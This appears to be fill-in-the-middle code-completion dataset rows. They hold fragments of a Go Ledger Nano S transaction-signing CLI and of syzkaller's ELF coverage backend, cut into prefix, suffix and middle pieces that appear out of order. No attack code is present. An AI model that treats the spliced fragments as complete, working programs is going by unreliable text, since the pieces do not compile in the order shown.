var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
} | log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
} | fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil { | random_line_split |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0 | }
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
} | for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit | random_line_split |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func | (target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
